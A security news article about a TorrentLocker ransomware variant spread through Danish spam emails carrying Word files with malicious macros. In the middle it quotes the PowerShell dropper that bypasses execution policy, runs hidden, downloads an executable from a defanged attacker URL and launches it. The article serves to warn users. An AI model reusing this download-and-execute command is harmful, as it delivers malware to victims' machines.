New TorrentLocker Variant Spreads Through Aggressive Spam Campaigns
Researchers from Heimdal Security report about a version of the notorious ransomware TorrentLocker that is currently spreading around through email attachments. Two large spam campaigns have been detected in the past few days carrying the TorrentLocker variant and they all target users in Denmark.
This time around, the malware campaigns are extremely aggressive, so experts warn users to be watchful about what e-mails they receive. The best tip is never to open an attachment in an e-mail coming from an untrusted source unless you explicitly expect the message and are sure about the safety of its content. What adds to the potential dangers from the new malware variant is that it still has very low detection rates. Performing a scan through VirusTotal reveals that only 3 out of 55 tested programs are capable of catching the TorrentLocker Ransomware, yet experts suspect the actual detection levels are even lower. Catching TorrentLocker more effectively is unlikely any soon as similar spam campaigns are showing low detection rates even days after they have been discovered.
TorrentLocker Ransomware Gets A New Distribution Method
This time, the new TorrentLocker is distributed through Microsoft Word documents in which the attackers have embedded malicious macros. Using social engineering techniques, the hackers trick users into downloading the infected files that will, later on, deploy the ransomware on their computer. The researchers found out that a PowerShell code that looks like this: "C: \ Windows \ System32 \ Windows PowerShell \ v1.0 \ PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent) .DWnlOAdFILE ( 'http: //48f4339.js2-order [.] Pl / file / set.rte ',' C: \ Users \ [% user profile%] \ AppData \ Roaming.EXE '); Start-process 'C: \ Users \ [% user profile%] \ AppData \ Roaming .exe"' is executed when the victim enables the macros by hitting the "Enable Editing" button. Then, the PowerSchell code downloads the TorrentLocker variant.
The default option in the macros settings allows the user to view the attached file, however, clicking the above-mentioned button is what triggers the activation of the malware, leading eventually to the entire computer being locked up.
Furthermore, the new TorrentLocker has some new features which raise its potential to cause severe damage to the infected machines. The new malware version does not only lock files on the victim's computer, but it is also capable of stealing usernames and passwords from the infected computer. Another new capability of the threat is to spread itself to other computers through shared files and documents.
While older versions of TorrentLocker can be removed without the need of the victim paying the ransom, researchers are in doubt whether that holds for the new variant as well. A decrypting tool is available. However, it has not been tested on this new variant and since the outcome is unknown victims of the new TorrentLocker should never try to remove it on their own. Therefore, the best way to protect your data is prevention and caution in dealing with your e-mail accounts.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.